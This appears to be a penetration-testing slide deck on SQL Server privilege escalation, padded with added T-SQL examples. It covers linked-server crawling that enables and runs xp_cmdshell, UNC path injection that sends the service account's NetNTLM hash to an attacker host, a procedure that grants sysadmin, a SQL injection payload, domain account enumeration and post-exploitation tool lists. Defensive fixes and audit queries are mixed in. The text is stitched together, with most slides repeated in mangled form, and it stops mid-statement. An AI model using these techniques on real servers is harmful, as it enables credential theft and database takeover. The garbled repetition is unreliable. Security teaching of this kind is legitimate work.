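-- 3. Two hops. The hop-2 query is a string literal inside the hop-1 string, so every
--    quote is doubled once more per hop: '' at hop 1 becomes '''' at hop 2. This
--    nesting, plus re-running step 1 on each server reached, is all a crawler does.
SELECT * FROM OPENQUERY([SQLSERVER2], '
  SELECT * FROM OPENQUERY([SQLSERVER3],
    ''SELECT @@servername AS srv, IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sysadmin'')
');

-- 4. OS command on the remote side. Statements that return no rowset (sp_configure,
--    RECONFIGURE) cannot go through OPENQUERY; EXEC ... AT runs them by RPC, which
--    needs is_rpc_out_enabled = 1 on the link and sysadmin for the mapped login there.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')          AT [SQLSERVER2];
EXEC ('EXEC master..xp_cmdshell ''whoami'';')                        AT [SQLSERVER2];

-- 5. The same command two hops out: nest the EXEC ... AT and double the quotes again.
EXEC ('EXEC (''EXEC master..xp_cmdshell ''''whoami'''';'') AT [SQLSERVER3];') AT [SQLSERVER2];
```

The quote doubling is the part that goes wrong by hand at three or more hops, which is the practical reason to let the crawler build the strings; the permissions model is unchanged at every depth: each hop runs as whatever login that hop's link was configured with.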
Escalating Privileges: UNC Path Injection
• The public role can perform UNC path injection into the BACKUP and RESTORE commands. The server opens the UNC path, authenticating to the remote share as its service account, before the command fails on permissions:
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008. For those versions (and as defence in depth everywhere) block outbound SMB, TCP 445, from database servers to untrusted networks, so the service account cannot be made to authenticate to an attacker's share.
Escalating Privileges: UNC Path Injection
So in summary...
Any login in the public role can, by default, make the server send the SQL Server service account's NetNTLM challenge-response (commonly called the NetNTLM hash) to a host of the attacker's choosing, where it can be cracked offline or relayed.
But who really has public role access? Oh yeah, a ton of domain users.
Escalating Privileges: UNC Path Injection DEMO
Get-SQLServiceAccountPwHashes ... what? It's self descriptive.
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges (directly on 2008 and earlier; through the per-service SID on 2012 and later, so code running inside the service process is still sysadmin).
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:
Approach: Common tools
Access as local administrator: Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem: PsExec, accessibility options or a debugger, with native SQL client tools
Recover the SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or a DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal the authentication token from the SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single user mode: DBATools
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify sensitive data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate sensitive data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
2. Get the principal ID for the sa account with SUSER_ID.
3. Use SUSER_NAME to get SQL logins using just the principal ID.
4. Increment the number and repeat.
SELECT n AS [id], SUSER_NAME(n) AS [user_name]
FROM (SELECT TOP 10000 ROW_NUMBER() OVER (ORDER BY t1.number) AS n
      FROM master..spt_values t1 CROSS JOIN master..spt_values t2) a
WHERE SUSER_NAME(n) IS NOT NULL
Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
3. Grab the first 48 hex characters (24 bytes) of the full SID to get the domain SID; the trailing 4 bytes are the RID of the principal looked up (00020000 is little-endian 512, Domain Admins).
Full SID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
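The domain SID extracted above is the input to domain account enumeration through SUSER_SNAME. As an added example that is not from the slides, here is that procedure carried through in T-SQL; CORP is a placeholder domain name, and nothing beyond public membership is needed to run it.

```sql
-- Added example, not from the slides. 'CORP' is a placeholder domain NetBIOS name.

-- 1. Resolve a principal that exists in every domain to get a full SID, then keep
--    the first 24 bytes (48 hex characters): that is the domain SID. The last
--    4 bytes are the RID, little-endian (00 02 00 00 = 512 = Domain Admins).
DECLARE @fullsid   varbinary(85) = SUSER_SID('CORP\Domain Admins');
DECLARE @domainsid varbinary(85) = SUBSTRING(@fullsid, 1, 24);

-- 2. Generate candidate RIDs (500 upwards: built-in accounts first, then the range
--    in which user and group objects are created), append each one as 4 little-endian
--    bytes, and let SUSER_SNAME() ask the domain which account owns that SID.
--    Unassigned RIDs come back NULL and are filtered out.
SELECT r.n AS rid,
       SUSER_SNAME(@domainsid + b.rid_le) AS account
FROM (SELECT TOP (2000) 500 + ROW_NUMBER() OVER (ORDER BY t1.number) - 1 AS n
      FROM master..spt_values AS t1 CROSS JOIN master..spt_values AS t2) AS r
CROSS APPLY (SELECT CAST( r.n             % 256 AS binary(1))   -- low byte first
                  + CAST((r.n / 256)      % 256 AS binary(1))
                  + CAST((r.n / 65536)    % 256 AS binary(1))
                  + CAST((r.n / 16777216) % 256 AS binary(1)) AS rid_le) AS b
WHERE SUSER_SNAME(@domainsid + b.rid_le) IS NOT NULL
ORDER BY r.n;
```

Each non-NULL row is a domain user, group or computer account resolved by the SQL Server on the attacker's behalf, so the lookups show up in the domain controller's logs as coming from the database server, not from the client.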
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login.
Pros:
• Can execute queries/commands in another user's context
• Limits the caller to the commands and queries in the procedure
• Don't have to grant IMPERSONATE
Cons:
• No granular control over the database owner's privileges
• The db_owner role can create procedures that EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login.
• The db_owner role can impersonate the actual database owner, and SYSADMIN is often the OWNER:
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures instead:
  o Create the stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure the login's privileges
  o Sign the stored procedure with the certificate
  o GRANT EXECUTE to the user
Pros:
• Can execute queries/commands in another user's context
• Limits the caller to the commands and queries in the procedure
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons:
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
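The seven steps above carried through end to end, as an added example that is not from the slides. MyAppDb, MyAppUser, the certificate name, the file path and the master key password are placeholders; the procedure body reads a DMV that needs VIEW SERVER STATE, a server-level permission MyAppUser should not hold directly.

```sql
-- Added example, not from the slides. MyAppDb, MyAppUser, the file path and the
-- password are placeholders.

-- Step 1: the procedure, in the application database
USE MyAppDb;
GO
CREATE PROCEDURE dbo.usp_ShowUserSessions
AS
    SELECT session_id, login_name, program_name
    FROM sys.dm_exec_sessions          -- needs VIEW SERVER STATE
    WHERE is_user_process = 1;
GO

-- Step 2: database master key (the certificate's private key is encrypted with it)
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'M@sterKeyPassw0rd!';   -- placeholder
-- Step 3: certificate in the application database
CREATE CERTIFICATE SignCert_UserSessions
    WITH SUBJECT = 'Signs dbo.usp_ShowUserSessions';
-- Step 6, done here because the private key lives in this database: sign the procedure.
-- Any later ALTER PROCEDURE drops the signature, which is the point.
ADD SIGNATURE TO dbo.usp_ShowUserSessions BY CERTIFICATE SignCert_UserSessions;
-- Export the public half so the login in master can be tied to the same certificate
BACKUP CERTIFICATE SignCert_UserSessions TO FILE = 'C:\Temp\SignCert_UserSessions.cer';
GO

-- Steps 4 and 5: login from the certificate, holding only what the body needs
USE master;
GO
CREATE CERTIFICATE SignCert_UserSessions FROM FILE = 'C:\Temp\SignCert_UserSessions.cer';
CREATE LOGIN SignCert_UserSessions_Login FROM CERTIFICATE SignCert_UserSessions;
GRANT VIEW SERVER STATE TO SignCert_UserSessions_Login;
GO

-- Step 7: the application user may call it. MyAppUser gains nothing else, and
-- MyAppDb stays TRUSTWORTHY OFF: the signature, not the database, is what is trusted.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_ShowUserSessions TO MyAppUser;
GO
```

Run directly by MyAppUser, the SELECT against sys.dm_exec_sessions fails with a permission error; called through the signed procedure it succeeds. The con on the slide still applies: a SQL injection inside a signed procedure runs with the certificate login's permission added, which is why that grant is a single permission rather than sysadmin.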
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO
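What the injection in sp_sqli2 looks like on the wire, beside a parameterised replacement, as an added example that is not from the slides. It assumes sp_sqli2 exists as defined above; sp_sqli2_fixed and the database name 'Adventure' are placeholders.

```sql
-- Added example, not from the slides. Assumes sp_sqli2 from the slide exists.

-- 1. Legitimate call: lists databases whose name contains 'Adventure', plus tempdb
EXEC sp_sqli2 'Adventure';

-- 2. Injected call. The argument closes the LIKE literal, appends a second statement
--    and comments out the tail, so the concatenated dynamic SQL becomes:
--      SELECT name FROM master..sysdatabases WHERE name like '%master' OR 1=1;
--      SELECT SUSER_SNAME() AS running_as --%' OR name='tempdb'
--    Whatever context the procedure runs in, the injected statement runs in too;
--    under EXECUTE AS OWNER in a TRUSTWORTHY database that is the owner, often a sysadmin.
EXEC sp_sqli2 'master'' OR 1=1; SELECT SUSER_SNAME() AS running_as --';

-- 3. Fixed version: the value is bound as a parameter of sp_executesql and never
--    concatenated into the statement text, so quotes inside it are data, not syntax.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases
          WHERE name LIKE ''%'' + @p + ''%'' OR name = N''tempdb''';
    EXEC sp_executesql @query, N'@p sysname', @p = @DbName;
END
GO

-- 4. The same payload is now just an unusual search pattern: one result set, no
--    second statement, no context leak.
EXEC dbo.sp_sqli2_fixed 'master'' OR 1=1; SELECT SUSER_SNAME() AS running_as --';
```

Parameterisation removes the injection; it does not shrink what the procedure is allowed to do. Pair it with the signed-procedure approach above so that even a future bug in the body can only exercise the one permission the certificate login holds.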
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation / Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
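The two Cons that matter most, a TRUSTWORTHY database whose owner is a sysadmin and modules already declared WITH EXECUTE AS OWNER, can be checked with the following T-SQL. It is an added defender-side example, not part of the PowerUpSQL deck; MyAppDb and MyAppDbOwner in the remediation comments are placeholders.

```sql
-- Added audit example (not from the PowerUpSQL deck).
-- Part 1: databases where an EXECUTE AS OWNER module could reach sysadmin.
-- Both conditions from the slide must hold: TRUSTWORTHY is on and the owner
-- is a sysadmin. msdb is TRUSTWORTHY by design, so it is excluded here.
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb'
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1;

-- Part 2 (run inside each application database): modules that already run as
-- the owner. execute_as_principal_id = -2 is the documented value for OWNER.
SELECT SCHEMA_NAME(o.schema_id) + '.' + o.name AS module_name,
       o.type_desc,
       o.modify_date
FROM sys.sql_modules AS m
JOIN sys.objects AS o ON o.object_id = m.object_id
WHERE m.execute_as_principal_id = -2;

-- Remediation pattern for a flagged database (placeholder names, run as
-- sysadmin): give it a low-privileged owner, then clear the flag so that
-- EXECUTE AS OWNER no longer yields a server-level context.
-- ALTER AUTHORIZATION ON DATABASE::[MyAppDb] TO [MyAppDbOwner];
-- ALTER DATABASE [MyAppDb] SET TRUSTWORTHY OFF;
```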
Escalating Privileges: Impersonation / Stored Procedure and Trigger Creation/Injection Issues
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
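The seven steps above carried through in T-SQL, as an added example that is not code from the PowerUpSQL deck. MyAppDb, MyAppUser, dbo.sp_list_databases, MyAppSigningCert, MyAppSigningLogin, the file paths and the passwords are placeholders; the certificate is created in master first, because a login can only be built from a certificate that lives in master, and a copy is then imported into the application database for signing.

```sql
-- Added example, not code from the PowerUpSQL deck. All names, paths and
-- passwords are placeholders. Run as sysadmin; the service account needs
-- read/write access to the placeholder folder for the BACKUP/CREATE steps.

-- Step 1: the procedure. No EXECUTE AS clause: it runs as the caller, and the
-- signature below adds the certificate login's rights only while it executes.
USE MyAppDb;
GO
CREATE PROCEDURE dbo.sp_list_databases
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name FROM master.sys.databases;   -- needs VIEW ANY DATABASE
END;
GO

-- Steps 3 and 4: certificate in master, and a login built from it. Such a
-- login cannot be used to connect; it exists only to carry permissions.
USE master;
GO
CREATE CERTIFICATE MyAppSigningCert
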